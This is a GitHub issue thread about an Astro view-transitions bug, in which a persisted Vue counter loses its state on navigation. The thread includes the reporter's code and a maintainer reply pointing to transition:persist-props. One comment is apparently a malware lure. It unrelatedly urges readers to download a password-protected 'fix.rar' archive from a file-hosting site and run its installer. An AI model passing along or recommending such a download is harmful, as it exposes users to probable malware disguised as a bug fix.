### ISSUE TITLE
View transition persist state

### ISSUE THREAD

**Issue by ardakod** [withastro/astro#11844]
### Astro Info

```block
Astro                    v4.14.5
Node                     v18.20.3
System                   Linux (x64)
Package Manager          unknown
Output                   static
Adapter                  none
Integrations             @astrojs/vue
```

### Describe the Bug

I am following examples from [docs](https://docs.astro.build/en/guides/view-transitions/#maintaining-state) and trying to get a simple Counter working where the component persists. Inside the component clicks on a button increase a count however after navigating this count is reset to 0. On the other hand an html video that is also persisted maintains its state as expected.

My counter is placed in Layout
```
<html lang="en">
	<head>
		<meta charset="UTF-8" />
		<meta name="description" content="Astro description">
		<meta name="viewport" content="width=device-width" />
		<link rel="icon" type="image/svg+xml" href="/favicon.svg" />		
		<title>{title}</title>
		<ViewTransitions />
	</head>
	<body>    
	<a href="/">Home</a> <a href="/test">Details</a>  
		<MyCounter transition:persist transition:name="counter" client:load/>
		<main>
			<slot />
		</main>
	</body>
</html>
```
MyCounter.vue
```
<template>
  <div>Counter is {{ count }}</div>

  <p>Increase the count then go to the details tab</p>
  <button type="button" @click="count++">Increase</button>
</template>

<script setup>
import { ref } from 'vue';
const count = ref(0);
</script>
```

When navigating to another page, the count is reset to 0.

### What's the expected result?

After navigating the count should be kept to the last value it had and not be reset to 0.

### Link to Minimal Reproducible Example

https://stackblitz.com/edit/github-sv58pq-nwjbcb?file=README.md

### Participation

- [ ] I am willing to submit a pull request for this issue.

**Comment by AMSNX** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by martrapp** [comment]
Hi @ardakod, thank you for opening this issue.

Re-hydration of the Vue component on navigation leads to errors which break your code.
Please also add [`transition:persist-props`](https://docs.astro.build/en/guides/view-transitions/#transitionpersist-props) to where you have the `transition:persist`.
That way you navigate without re-evaluating the persisted component.
